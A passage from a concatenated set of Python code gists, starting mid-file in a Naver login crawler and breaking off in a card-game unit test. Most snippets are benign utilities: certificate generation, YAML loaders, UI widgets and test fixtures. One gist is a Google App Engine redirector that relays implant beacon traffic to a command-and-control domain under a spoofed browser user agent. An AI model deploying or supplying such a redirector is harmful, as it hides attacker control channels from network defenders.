var innerDoc = document.getElementById('loginframe').contentWindow.document;
innerDoc.getElementById('id').value = '%s';
innerDoc.getElementById('pw').value = '%s';
innerDoc.getElementsByClassName('btn_login')[0].click();
})();
""" % (id, pw), expect_loading = True)
# 로그인 결과를 기다립니다.
self.ghost.wait_for_selector('#query')
def cloneCookieJar(self):
cookieJar = cookielib.LWPCookieJar()
self.ghost.save_cookies(cookieJar)
return cookieJar
# 네이버 메인 페이지에서 검색을 수행합니다.
def main_search(self, query):
# 네이버 메인 페이지를 엽니다.
self.openPage('http://www.<EMAIL>')
self.ghost.wait_for_selector('#query')
self.ghost.fill("#sform", { "query": query })
self.ghost.fire_on('#sform', 'submit', expect_loading = True)
if __name__ == "__main__":
crawler = NaverCrawler(LOGIN_ID, LOGIN_PW, False)
cj = crawler.cloneCookieJar()
cj.save(COOKIE_FILE)
```
#### File: hard-gists/905137/snippet.py
```python
import itertools
import mimetools
import mimetypes
from cStringIO import StringIO
import urllib
import urllib2
import gtk
class MultiPartForm(object):
"""Accumulate the data to be used when posting a form."""
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
"""Add a simple field to the form data."""
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
"""Add a file to be uploaded."""
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
"""Return a string representing the form data, including attached files."""
# Build a list of lists, each containing "lines" of the
# request. Each part is separated by a boundary string.
# Once the list is built, return a string where each
# line is separated by '\r\n'.
parts = []
part_boundary = '--' + self.boundary
# Add the form fields
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
# Add the files to upload
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
# Flatten the list and add closing boundary marker,
# then return CR+LF separated data
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
def screenshot(url, **args):
return WebKitScreenShot(url, **args).image
class WebKitScreenShot(object):
"""
make fullscreen webkit window, then take screenshot into self.image
"""
def __init__(self, url=None,
font_size=14,
font_default="VLGothic",
font_serif="VLGothic",
font_sans_serif="VLGothic",
font_monospace="VLGothic",
size=None):
import webkit
gtk.gdk.threads_init()
#gtk.gdk.threads_enter()
window = gtk.Window(gtk.WINDOW_TOPLEVEL)
scr = gtk.ScrolledWindow()
window.move(0, 0)
if not size:
size = (gtk.gdk.screen_width(), gtk.gdk.screen_height())
window.resize(*size)
webview = webkit.WebView()
# webkit settings
settings = webkit.WebSettings()
settings.set_property("serif-font-family", font_serif)
settings.set_property("sans-serif-font-family", font_sans_serif)
settings.set_property("monospace-font-family", font_monospace)
settings.set_property("default-font-family", font_default)
settings.set_property("default-font-size", font_size)
webview.set_settings(settings)
#window.add(scr)
#scr.add(webview)
window.add(webview)
webview.connect("load-finished", self._loaded)
webview.open(url)
self.webview = webview
window.show_all()
self.window = window
gtk.main()
gtk.gdk.threads_leave()
def _loaded(self, view, frame):
gtk.gdk.threads_enter()
#import gtk
import Image
try:
#print dir(frame.get_global_context())
pixmap = view.get_snapshot()
#print pixmap.get_size()
width, height = view.window.get_size()
# see: http://www.pygtk.org/docs/pygtk/class-gdkpixbuf.html
pixbuf = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,
False, 8, width, height)
#pixbuf.get_from_drawable(view.window, view.window.get_colormap(),
pixbuf.get_from_drawable(pixmap, view.window.get_colormap(),
0, 0, 0, 0, width, height)
self.image = Image.fromstring("RGB", (width, height),
pixbuf.get_pixels())
gtk.main_quit()
except:
import traceback
traceback.print_exc()
gtk.gdk.threads_leave()
def check_url(url):
from urlparse import urlparse
ret = urlparse(url)
scheme = ret.scheme
if scheme not in ["http", "https"]:
return False
hostname = ret.hostname
if hostname.startswith("192.168"):
return False
return True
def gyazo(url):
if not check_url(url):
print "Permission denied"
return
font = "VLGothic"
import Image
image = screenshot(url,
font_default=font, font_sans_serif=font,
font_serif=font, font_monospace=font)
import tempfile
tmp = tempfile.TemporaryFile()
image.save(tmp, "png")
tmp.seek(0)
form = MultiPartForm()
form.add_field('id', '')
form.add_file('imagedata', 'gyazo.com',
fileHandle=tmp)
request = urllib2.Request('http://gyazo.com/upload.cgi')
request.add_header('User-agent', 'Gyazo/1.0)')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Content-length', len(body))
request.add_data(body)
print urllib2.urlopen(request).read()
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser()
parser.usage += " URL"
opts, args = parser.parse_args()
if len(args) == 0:
parser.print_help()
import sys
sys.exit(-1)
url = args[0]
gyazo(url)
```
#### File: hard-gists/9089444/snippet.py
```python
from rest_framework import serializers
class HyperlinkedIdentityField(serializers.HyperlinkedIdentityField):
"""
This is a performance wrapper for HyperlinkedIdentityField.
We save a ton of time by not calling reverse potentially
thousands of times per request.
"""
def __init__(self, *args, **kwargs):
self.view_url = kwargs.pop("view_url", "")
super(HyperlinkedIdentityField, self).__init__(*args, **kwargs)
def field_to_native(self, obj, field_name):
return "http%s://%s%s" % (
"s" if not settings.DEBUG else "",
self.context["request"]._request.META["HTTP_HOST"],
self.view_url % obj.id,
)
# Example :
# items = HyperlinkedIdentityField(view_url="/api/subscriptions/%s/items/",
# view_name="subscription_item_list", pk_url_kwarg="subscription_id")
```
#### File: hard-gists/908ef5f4fa162f15b3b8/snippet.py
```python
import os
import socket
from OpenSSL import crypto, SSL
# OpenVPN is fairly simple since it works on OpenSSL. The OpenVPN server contains
# a root certificate authority that can sign sub-certificates. The certificates
# have very little or no information on who they belong to besides a filename
# and any required information. Everything else is omitted or blank.
# The client certificate and private key are inserted into the .ovpn file
# which contains some settins as well and the entire thing is then ready for
# the user.
# EasyRSA generates a standard unsigned certificate, certificate request, and private key.
# It then signs the certificate against the CA then dumps the certificate request in the trash.
# The now signed certificate and private key are returned.
# Create a new keypair of specified algorithm and number of bits.
def make_keypair(algorithm=crypto.TYPE_RSA, numbits=2048):
pkey = crypto.PKey()
pkey.generate_key(algorithm, numbits)
return pkey
# Creates a certificate signing request (CSR) given the specified subject attributes.
def make_csr(pkey, CN, C=None, ST=None, L=None, O=None, OU=None, emailAddress=None, hashalgorithm='sha256WithRSAEncryption'):
req = crypto.X509Req()
req.get_subject()
subj = req.get_subject()
if C:
subj.C = C
if ST:
subj.ST = ST
if L:
subj.L = L
if O:
subj.O = O
if OU:
subj.OU = OU
if CN:
subj.CN = CN
if emailAddress:
subj.emailAddress = emailAddress
req.set_pubkey(pkey)
req.sign(pkey, hashalgorithm)
return req
# Create a certificate authority (if we need one)
def create_ca(CN, C="", ST="", L="", O="", OU="", emailAddress="", hashalgorithm='sha256WithRSAEncryption'):
cakey = make_keypair()
careq = make_csr(cakey, cn=CN)
cacert = crypto.X509()
cacert.set_serial_number(0)
cacert.gmtime_adj_notBefore(0)
cacert.gmtime_adj_notAfter(60*60*24*365*10) # 10 yrs - hard to beat this kind of cert!
cacert.set_issuer(careq.get_subject())
cacert.set_subject(careq.get_subject())
cacert.set_pubkey(careq.get_pubkey())
cacert.set_version(2)
# Set the extensions in two passes
cacert.add_extensions([
crypto.X509Extension('basicConstraints', True,'CA:TRUE'),
crypto.X509Extension('subjectKeyIdentifier' , True , 'hash', subject=cacert)
])
# ... now we can set the authority key since it depends on the subject key
cacert.add_extensions([
crypto.X509Extension('authorityKeyIdentifier' , False, 'issuer:always, keyid:always', issuer=cacert, subject=cacert)
])
cacert.sign(cakey, hashalgorithm)
return (cacert, cakey)
# Create a new slave cert.
def create_slave_certificate(csr, cakey, cacert, serial):
cert = crypto.X509()
cert.set_serial_number(serial)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(60*60*24*365*10) # 10 yrs - hard to beat this kind of cert!
cert.set_issuer(cacert.get_subject())
cert.set_subject(csr.get_subject())
cert.set_pubkey(csr.get_pubkey())
cert.set_version(2)
extensions = []
extensions.append(crypto.X509Extension('basicConstraints', False ,'CA:FALSE'))
extensions.append(crypto.X509Extension('subjectKeyIdentifier' , False , 'hash', subject=cert))
extensions.append(crypto.X509Extension('authorityKeyIdentifier' , False, 'keyid:always,issuer:always', subject=cacert, issuer=cacert))
cert.add_extensions(extensions)
cert.sign(cakey, 'sha256WithRSAEncryption')
return cert
# Dumps content to a string
def dump_file_in_mem(material, format=crypto.FILETYPE_PEM):
dump_func = None
if isinstance(material, crypto.X509):
dump_func = crypto.dump_certificate
elif isinstance(material, crypto.PKey):
dump_func = crypto.dump_privatekey
elif isinstance(material, crypto.X509Req):
dump_func = crypto.dump_certificate_request
else:
raise Exception("Don't know how to dump content type to file: %s (%r)" % (type(material), material))
return dump_func(format, material)
# Loads the file into the appropriate openssl object type.
def load_from_file(materialfile, objtype, format=crypto.FILETYPE_PEM):
if objtype is crypto.X509:
load_func = crypto.load_certificate
elif objtype is crypto.X509Req:
load_func = crypto.load_certificate_request
elif objtype is crypto.PKey:
load_func = crypto.load_privatekey
else:
raise Exception("Unsupported material type: %s" % (objtype,))
with open(materialfile, 'r') as fp:
buf = fp.read()
material = load_func(format, buf)
return material
def retrieve_key_from_file(keyfile):
return load_from_file(keyfile, crypto.PKey)
def retrieve_csr_from_file(csrfile):
return load_from_file(csrfile, crypto.X509Req)
def retrieve_cert_from_file(certfile):
return load_from_file(certfile, crypto.X509)
def make_new_ovpn_file(ca_cert, ca_key, clientname, serial, commonoptspath, filepath):
# Read our common options file first
f = open(commonoptspath, 'r')
common = f.read()
f.close()
cacert = retrieve_cert_from_file(ca_cert)
cakey = retrieve_key_from_file(ca_key)
# Generate a new private key pair for a new certificate.
key = make_keypair()
# Generate a certificate request
csr = make_csr(key, clientname)
# Sign the certificate with the new csr
crt = create_slave_certificate(csr, cakey, cacert, serial)
# Now we have a successfully signed certificate. We must now
# create a .ovpn file and then dump it somewhere.
clientkey = dump_file_in_mem(key)
clientcert = dump_file_in_mem(crt)
cacertdump = dump_file_in_mem(cacert)
ovpn = "%s<ca>\n%s</ca>\n<cert>\n%s</cert>\n<key>\n%s</key>\n" % (common, cacertdump, clientcert, clientkey)
# Write our file.
f = open(filepath, 'w')
f.write(ovpn)
f.close()
if __name__ == "__main__":
make_new_ovpn_file("ca.crt", "ca.key", "justasictest", 0x0C, "common.txt", "justastictest.ovpn")
print("Done")
```
#### File: hard-gists/90fe4a3bc0caa582fc563ec503e5444c/snippet.py
```python
import logging
import urllib
import webapp2
import urllib2
# v1.0.1 - updated to support POST request
# change to your IP
redirector = "(insert you C2 domain here)"
class CommandControl(webapp2.RequestHandler):
def get(self, data):
url = 'https://'+redirector+'/'+str(data)
try:
req = urllib2.Request(url)
req.add_header('User-Agent',"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko")
for key, value in self.request.headers.iteritems():
req.add_header(str(key), str(value))
resp = urllib2.urlopen(req)
content = resp.read()
self.response.write(content)
except urllib2.URLError:
"Caught Exception, did nothing"
# handle a POST request
def post(self, data):
url = 'https://'+redirector+'/'+str(data)
try:
req = urllib2.Request(url)
req.add_header('User-Agent',"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko")
for key, value in self.request.headers.iteritems():
req.add_header(str(key), str(value))
# this passes on the data from CB
req.data = self.request.body
resp = urllib2.urlopen(req)
content = resp.read()
self.response.write(content)
except urllib2.URLError:
"Caught Exception, did nothing"
app = webapp2.WSGIApplication([
(r"/(.+)", CommandControl)
], debug=True)
```
#### File: hard-gists/9110299/snippet.py
```python
__author__ = 'Alisue <<EMAIL>>'
try:
from PySide import QtCore
from PySide import QtGui
except ImportError:
from PyQt4 import QtCore
from PyQt4 import QtGui
def hex2QColor(c):
"""Convert Hex color to QColor"""
r=int(c[0:2],16)
g=int(c[2:4],16)
b=int(c[4:6],16)
return QtGui.QColor(r,g,b)
class RoundedWindow(QtGui.QWidget):
def __init__(self, parent=None):
super(RoundedWindow, self).__init__(parent)
# make the window frameless
self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground)
self.backgroundColor = hex2QColor("efefef")
self.foregroundColor = hex2QColor("333333")
self.borderRadius = 5
self.draggable = True
self.dragging_threshould = 5
self.__mousePressPos = None
self.__mouseMovePos = None
layout = QtGui.QVBoxLayout(self)
layout.setContentsMargins(0, 0, 0, 0)
layout.setSpacing(0)
layout.addWidget(QtGui.QSizeGrip(self), 0,
QtCore.Qt.AlignBottom | QtCore.Qt.AlignRight)
self.setMinimumSize(320, 240)
def paintEvent(self, event):
# get current window size
s = self.size()
qp = QtGui.QPainter()
qp.begin(self)
qp.setRenderHint(QtGui.QPainter.Antialiasing, True)
qp.setPen(self.foregroundColor)
qp.setBrush(self.backgroundColor)
qp.drawRoundedRect(0, 0, s.width(), s.height(),
self.borderRadius, self.borderRadius)
qp.end()
def mousePressEvent(self, event):
if self.draggable and event.button() == QtCore.Qt.LeftButton:
self.__mousePressPos = event.globalPos() # global
self.__mouseMovePos = event.globalPos() - self.pos() # local
super(RoundedWindow, self).mousePressEvent(event)
def mouseMoveEvent(self, event):
if self.draggable and event.buttons() & QtCore.Qt.LeftButton:
globalPos = event.globalPos()
moved = globalPos - self.__mousePressPos
if moved.manhattanLength() > self.dragging_threshould:
# move when user drag window more than dragging_threshould
diff = globalPos - self.__mouseMovePos
self.move(diff)
self.__mouseMovePos = globalPos - self.pos()
super(RoundedWindow, self).mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
if self.__mousePressPos is not None:
if event.button() == QtCore.Qt.LeftButton:
moved = event.globalPos() - self.__mousePressPos
if moved.manhattanLength() > self.dragging_threshould:
# do not call click event or so on
event.ignore()
self.__mousePressPos = None
super(RoundedWindow, self).mouseReleaseEvent(event)
# close event
if event.button() == QtCore.Qt.RightButton:
QtGui.qApp.exit()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
main = RoundedWindow()
main.show()
sys.exit(app.exec_())
```
#### File: hard-gists/9160719/snippet.py
```python
import sys
import os
import yaml
import json
class IncludeLoader(yaml.Loader):
"""
Custom YAML loader that adds an !include constructor for including
other YAML files relative to the current file being parsed.
Example:
section: !include other/file.yaml
"""
def __init__(self, stream):
self._root = os.path.abspath(os.path.split(stream.name)[0])
super(IncludeLoader, self).__init__(stream)
def include(self, node):
path = self.construct_scalar(node)
filename = path if path[0] == '/' else os.path.join(self._root, path)
with open(filename, 'r') as f:
return yaml.load(f, IncludeLoader)
IncludeLoader.add_constructor('!include', IncludeLoader.include)
def parse_yaml(template):
"""
Constructs a Packer JSON configuration file from the specified YAML
template and returns it as a string.
The YAML template format adds some flexibility and readability by
adding comments and an !include directive, allowing for the
following template syntax:
builders:
- !include build/ubuntu-12.04.kvm.yaml
- !include build/ubuntu-12.04.ami.yaml
provisioners:
- !include provision/ubuntu-12.04-base.yaml
- !include provision/ops-deploy.yaml
- !include provision/java7.yaml
- type: shell
script: app/setup.sh
In addition to the !include directive, the resulting YAML is
post-processed to flatten lists-of-lists in the top level sections,
allowing includes to contain lists of multiple entries (i.e. running
two shell scripts in a common provisioner.)
"""
with open(template, 'r') as infile:
parsed = yaml.load(infile, IncludeLoader)
# Flatten sections to allow including lists of steps in each include
for section in ('builders', 'provisioners', 'post-processors'):
if section in parsed:
parsed[section] = [f for l in [e if isinstance(e, list) else [e]
for e in parsed[section]] for f in l]
return json.dumps(parsed)
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.stderr.write("ERROR: No template specified")
sys.exit(1)
if not os.path.exists(sys.argv[1]):
std.stderr.write("ERROR: Template not found: %s" % sys.argv[1])
sys.exit(2)
sys.stdout.write(parse_yaml(sys.argv[1]))
```
#### File: hard-gists/931406/snippet.py
```python
import memcache
import random
NS_KEY_RANGE_MAX = 1000000
mc = memcache.Client(['127.0.0.1:11211'], debug=0)
def clear_ns(ns):
mc.incr(_compute_ns_key(ns))
def _compute_key(key, ns=None):
if ns:
return '%s_%d_%s' % (ns, get_ns_key(ns), str(key),)
return key
def _compute_ns_key(ns):
return '%s_ns_key' % ns
def get(key, ns=None):
return mc.get(_compute_key(key, ns))
def get_ns_key(ns):
ns_key = mc.get(_compute_ns_key(ns))
if not ns_key:
ns_key = random.randint(1, NS_KEY_RANGE_MAX)
mc.set(_compute_ns_key(ns), ns_key)
return ns_key
def set(key, val, ns=None, **kwargs):
return mc.set(_compute_key(key, ns), val, **kwargs)
mc.flush_all()
assert get('blah') == None
set('blah', 2)
assert get('blah') == 2
assert get('blah', ns='foo') == None
set('blah', 8, ns='foo')
assert get('blah', ns='foo') == 8
assert get('blah') == 2
clear_ns('foo')
assert get('blah', ns='foo') == None
assert get('blah') == 2
```
#### File: hard-gists/932345/snippet.py
```python
from PIL import Image, ImageChops
def trim(im, border):
bg = Image.new(im.mode, im.size, border)
diff = ImageChops.difference(im, bg)
bbox = diff.getbbox()
if bbox:
return im.crop(bbox)
def create_thumbnail(path, size):
image = Image.open(path)
name, extension = path.split('.')
options = {}
if 'transparency' in image.info:
options['transparency'] = image.info["transparency"]
image.thumbnail((size, size), Image.ANTIALIAS)
image = trim(image, 255) ## Trim whitespace
image.save(name + '_new.' + extension, **options)
return image
```
#### File: hard-gists/9358479/snippet.py
```python
import os
from urllib.parse import urlparse
from flask.ext.migrate import upgrade
import pytest
from sqlalchemy import event
from sqlalchemy.orm import Session
from pygotham.core import db
from pygotham.factory import create_app
from tests import settings
@pytest.fixture(scope='session')
def app():
app = create_app(__name__, '', settings)
context = app.test_request_context()
context.push()
return app
@pytest.fixture(scope='session', autouse=True)
def setup_db(request, app):
db_name = urlparse(app.config['SQLALCHEMY_DATABASE_URI']).path[1:]
if os.system("psql -l | grep '{}'".format(db_name)) == 0:
assert not os.system('dropdb {}'.format(db_name))
assert not os.system('createdb -E utf-8 {}'.format(db_name))
upgrade()
@event.listens_for(Session, 'after_transaction_end')
def restart_savepoint(session, transaction):
if transaction.nested and not transaction._parent.nested:
session.begin_nested()
@pytest.fixture(autouse=True)
def dbsession(request):
request.addfinalizer(db.session.remove)
db.session.begin_nested()
```
#### File: hard-gists/94d747fe5180851196eb/snippet.py
```python
import yaml
from yaml.constructor import ConstructorError
try:
from yaml import CLoader as Loader
except ImportError:
from yaml import Loader
def no_duplicates_constructor(loader, node, deep=False):
"""Check for duplicate keys."""
mapping = {}
for key_node, value_node in node.value:
key = loader.construct_object(key_node, deep=deep)
value = loader.construct_object(value_node, deep=deep)
if key in mapping:
raise ConstructorError("while constructing a mapping", node.start_mark,
"found duplicate key (%s)" % key, key_node.start_mark)
mapping[key] = value
return loader.construct_mapping(node, deep)
yaml.add_constructor(yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG, no_duplicates_constructor)
# Works fine (no duplicate keys)
yaml_data = yaml.load('''
---
foo: bar
baz: qux
'''
)
# Works fine (no duplicate keys on the same level)
yaml_data = yaml.load('''
---
foo:
bar: baz
baz: qux
bar:
bar: baz
baz: qux
'''
)
# Raises exception (has duplicate keys)
yaml_data = yaml.load('''
---
foo: bar
foo: qux
'''
)
```
#### File: hard-gists/964472/snippet.py
```python
from django.conf import settings
from django.utils.importlib import import_module
from django.contrib.auth import SESSION_KEY, BACKEND_SESSION_KEY
def request_factory_login(factory, user, backend='django.contrib.backends.ModelBackend'):
engine = import_module(settings.SESSION_ENGINE)
factory.session = engine.SessionStore()
request.session[SESSION_KEY] = user.id
request.session[BACKEND_SESSION_KEY] = backend
factory.session.save()
session_cookie = settings.SESSION_COOKIE_NAME
factory.cookies[session_cookie] = request.session.session_key
```
#### File: hard-gists/9649532644540b5b798308f66699ef67/snippet.py
```python
import shlex
import lldb
import re
def breakonmethod(debugger, command, exe_ctx,result, internal_dict):
args=shlex.split(command)
Class=args[0]
Method=args[1]
ClassMethod = lldb.SBCommandReturnObject()
CMCommand='expr -- (IMP)method_getImplementation((Method)class_getClassMethod((Class)objc_getClass("{0}"),@selector({1})));'.format(Class,Method)
IMCommand='expr -- (IMP)method_getImplementation((Method)class_getInstanceMethod((Class)objc_getClass("{0}"),@selector({1})));'.format(Class,Method)
debugger.GetCommandInterpreter().HandleCommand(CMCommand, ClassMethod)
InstanceMethod =lldb.SBCommandReturnObject()
debugger.GetCommandInterpreter().HandleCommand(IMCommand,InstanceMethod)
CMObj=ClassMethod.GetOutput()
IMObj=InstanceMethod.GetOutput()
CMObj=re.search(r'0x([a-zA-Z0-9]|x)*', CMObj).group(0)
IMObj=re.search(r'0x([a-zA-Z0-9]|x)*', IMObj).group(0)
CMObj=int(CMObj, 16)
IMObj=int(IMObj, 16)
ADDR=max(CMObj,IMObj)
debugger.HandleCommand("breakpoint set -a %i"%ADDR)
def __lldb_init_module (debugger, dict):
#Avoid Name Collision
debugger.HandleCommand('command script add -f BreakMessage.breakonmethod bom')
```
#### File: hard-gists/9655195/snippet.py
```python
from kivy.uix.widget import Widget
from kivy.uix.label import Label
from kivy.uix.behaviors import ButtonBehavior
from kivy.lang import Builder
from kivy.clock import Clock
from kivy.animation import Animation
from kivy.properties import (
NumericProperty, ListProperty, ObjectProperty, DictProperty)
from kivy.app import App
from functools import partial
from copy import copy
KV = '''
#:import pi math.pi
#:import cos math.cos
#:import sin math.sin
#:import V kivy.vector.Vector
<ModernMenu>:
canvas.before:
Color:
rgba: 1, 0, 0, .4
Ellipse:
pos: self.center_x - self.radius, self.center_y - self.radius
size: self.radius * 2, self.radius * 2
angle_start: 0
angle_end: self.circle_progress * 360 * self.creation_direction
Color:
rgba: self.color
Line:
circle:
(
self.center_x, self.center_y,
self.radius, 0, self.circle_progress * 360 * self.creation_direction
)
width: self.line_width
on_touch_down:
V(args[1].pos).distance(self.center) < self.radius and (
self.back() if self.choices_history else self.dismiss())
<ModernMenuLabel>:
size: self.texture_size
padding: 5, 5
on_press: self.callback and self.callback(self)
canvas.before:
Color:
rgba: .1, .4, .4, .9
Rectangle:
pos: self.pos
size: self.size
Line:
points:
(
self.center_x, self.center_y,
self.parent.center_x + cos(
self.opacity * self.index * 2 * pi / self.siblings
) * self.parent.radius,
self.parent.center_y + sin(
self.opacity * self.index * 2 * pi / self.siblings
) * self.parent.radius
) if self.parent else []
width: self.parent.line_width if self.parent else 1
center:
(
self.parent.center_x +
cos(self.opacity * self.index * 2 * pi / self.siblings) * self.radius,
self.parent.center_y +
sin(self.opacity * self.index * 2 * pi / self.siblings) * self.radius
) if (self.size and self.parent and self.parent.children) else (0, 0)
'''
def dist((x1, y1), (x2, y2)):
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 5
class ModernMenuLabel(ButtonBehavior, Label):
index = NumericProperty(0)
radius = NumericProperty(100)
siblings = NumericProperty(1)
callback = ObjectProperty(None)
def on_parent(self, *args):
if self.parent:
self.parent.bind(children=self.update_siblings)
def update_siblings(self, *args):
if self.parent:
self.siblings = max(0, len(self.parent.children))
else:
self.siblings = 1
class ModernMenu(Widget):
radius = NumericProperty(50)
circle_width = NumericProperty(5)
line_width = NumericProperty(2)
color = ListProperty([.3, .3, .3, 1])
circle_progress = NumericProperty(0)
creation_direction = NumericProperty(1)
creation_timeout = NumericProperty(1)
choices = ListProperty([])
item_cls = ObjectProperty(ModernMenuLabel)
item_args = DictProperty({'opacity': 0})
animation = ObjectProperty(Animation(opacity=1, d=.5))
choices_history = ListProperty([])
def start_display(self, touch):
touch.grab(self)
a = Animation(circle_progress=1, d=self.creation_timeout)
a.bind(on_complete=self.open_menu)
touch.ud['animation'] = a
a.start(self)
def open_menu(self, *args):
self.clear_widgets()
for i in self.choices:
kwargs = copy(self.item_args)
kwargs.update(i)
ml = self.item_cls(**kwargs)
self.animation.start(ml)
self.add_widget(ml)
def open_submenu(self, choices, *args):
self.choices_history.append(self.choices)
self.choices = choices
self.open_menu()
def back(self, *args):
self.choices = self.choices_history.pop()
self.open_menu()
def on_touch_move(self, touch, *args):
if (
touch.grab_current == self and
dist(touch.pos, touch.opos) > self.radius and
self.parent and
self.circle_progress < 1
):
self.parent.remove_widget(self)
return super(ModernMenu, self).on_touch_move(touch, *args)
def on_touch_up(self, touch, *args):
if (
touch.grab_current == self and
self.parent and
self.circle_progress < 1
):
self.parent.remove_widget(self)
return super(ModernMenu, self).on_touch_up(touch, *args)
def dismiss(self):
a = Animation(opacity=0)
a.bind(on_complete=self._remove)
a.start(self)
def _remove(self, *args):
if self.parent:
self.parent.remove_widget(self)
class MenuSpawner(Widget):
timeout = NumericProperty(0.1)
menu_cls = ObjectProperty(ModernMenu)
cancel_distance = NumericProperty(10)
menu_args = DictProperty({})
def on_touch_down(self, touch, *args):
t = partial(self.display_menu, touch)
touch.ud['menu_timeout'] = t
Clock.schedule_once(t, self.timeout)
return super(MenuSpawner, self).on_touch_down(touch, *args)
def on_touch_move(self, touch, *args):
if (
touch.ud['menu_timeout'] and
dist(touch.pos, touch.opos) > self.cancel_distance
):
Clock.unschedule(touch.ud['menu_timeout'])
return super(MenuSpawner, self).on_touch_move(touch, *args)
def on_touch_up(self, touch, *args):
if touch.ud.get('menu_timeout'):
Clock.unschedule(touch.ud['menu_timeout'])
return super(MenuSpawner, self).on_touch_up(touch, *args)
def display_menu(self, touch, dt):
menu = self.menu_cls(center=touch.pos, **self.menu_args)
self.add_widget(menu)
menu.start_display(touch)
Builder.load_string(KV)
TESTAPP_KV = '''
FloatLayout:
ScrollView:
BoxLayout:
orientation: 'vertical'
size_hint_y: None
height: 1000
Button:
text: 'test1'
Label:
text: 'label1'
Button:
text: 'test2'
Label:
text: 'label2'
Button:
text: 'test3'
Label:
text: 'label3'
MenuSpawner:
timeout: .8
menu_args:
dict(
creation_direction=-1,
radius=30,
creation_timeout=.4,
choices=[
dict(text='submenu 1', index=1, callback=app.callback1),
dict(text='action 1', index=2, callback=app.callback2),
dict(text='action 2', index=3, callback=app.callback3),
dict(text='submenu 2', index=4, callback=app.callback4),
dict(text='action 3', index=5, callback=app.callback5),
])
'''
class ModernMenuApp(App):
def build(self):
return Builder.load_string(TESTAPP_KV)
def callback1(self, *args):
print "test 1"
args[0].parent.open_submenu(
choices=[
dict(text='action 1', index=1, callback=self.callback2),
dict(text='action 2', index=2, callback=self.callback2),
dict(text='action 3', index=3, callback=self.callback2),
])
def callback2(self, *args):
print "test 2"
args[0].parent.dismiss()
def callback3(self, *args):
print "test 3"
args[0].parent.dismiss()
def callback4(self, *args):
print "test 4"
args[0].parent.open_submenu(
choices=[
dict(text='hey', index=1, callback=self.callback2),
dict(text='oh', index=2, callback=self.callback2),
])
def callback5(self, *args):
print "test 5"
args[0].parent.dismiss()
if __name__ == '__main__':
ModernMenuApp().run()
```
#### File: hard-gists/9750796/snippet.py
```python
import numpy as np
import marisa_trie
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.externals import six
class MarisaCountVectorizer(CountVectorizer):
# ``CountVectorizer.fit`` method calls ``fit_transform`` so
# ``fit`` is not provided
def fit_transform(self, raw_documents, y=None):
X = super(MarisaCountVectorizer, self).fit_transform(raw_documents)
X = self._freeze_vocabulary(X)
return X
def _freeze_vocabulary(self, X=None):
if not self.fixed_vocabulary_:
frozen = marisa_trie.Trie(six.iterkeys(self.vocabulary_))
if X is not None:
X = self._reorder_features(X, self.vocabulary_, frozen)
self.vocabulary_ = frozen
self.fixed_vocabulary_ = True
del self.stop_words_
return X
def _reorder_features(self, X, old_vocabulary, new_vocabulary):
map_index = np.empty(len(old_vocabulary), dtype=np.int32)
for term, new_val in six.iteritems(new_vocabulary):
map_index[new_val] = old_vocabulary[term]
return X[:, map_index]
```
#### File: hard-gists/9773143/snippet.py
```python
import unittest
import collections
from solution import (RANKS, SUITS, Card, CardCollection,
StandardDeck, SixtySixDeck, BeloteDeck)
class RankTest(unittest.TestCase):
def setUp(self):
self.rank_string = 'Three'
self.rank = RANKS[self.rank_string]()
def test_creation(self):
self.assertTrue(self.rank.__class__.__name__, self.rank_string)
def test_equality_for_identical_ranks(self):
rank_copy = RANKS[self.rank_string]()
self.assertEqual(rank_copy, self.rank)
def test_equality_for_diffent_ranks(self):
different_rank = RANKS['Four']()
self.assertNotEqual(different_rank, self.rank)
def test_stringify(self):
self.assertEqual(self.rank_string, str(self.rank))
def test_symbol_is_there(self):
self.assertEqual(self.rank.symbol, '3')
class SuitTest(unittest.TestCase):
def setUp(self):
self.suit_string = 'Diamonds'
self.suit = SUITS[self.suit_string]()
def test_creation(self):
self.assertTrue(self.suit.__class__.__name__, self.suit_string)
def test_equality_for_identical_suits(self):
suit_copy = SUITS[self.suit_string]()
self.assertEqual(suit_copy, self.suit)
def test_equality_for_diffent_suits(self):
different_suit = SUITS['Hearts']()
self.assertNotEqual(different_suit, self.suit)
def test_stringify(self):
self.assertEqual(self.suit_string, str(self.suit))
def test_color_is_there(self):
self.assertEqual(self.suit.color, 'red')
class CardTest(unittest.TestCase):
def setUp(self):
self.rank = RANKS['Ace']
self.suit = SUITS['Spades']
self.card = Card(self.rank, self.suit)
def test_equality_for_identical_cards(self):
self.assertEqual(self.card, Card(self.rank, self.suit))
def test_equality_for_different_cards(self):
different_card = Card(RANKS['Queen'], SUITS['Diamonds'])
self.assertNotEqual(different_card, self.card)
def test_stringify(self):
self.assertEqual(str(self.card), 'Ace of Spades')
class CardCollectionTest(unittest.TestCase):
def setUp(self):
self.collection = [Card(RANKS['Ace'], SUITS['Diamonds']),
Card(RANKS['Queen'], SUITS['Spades']),
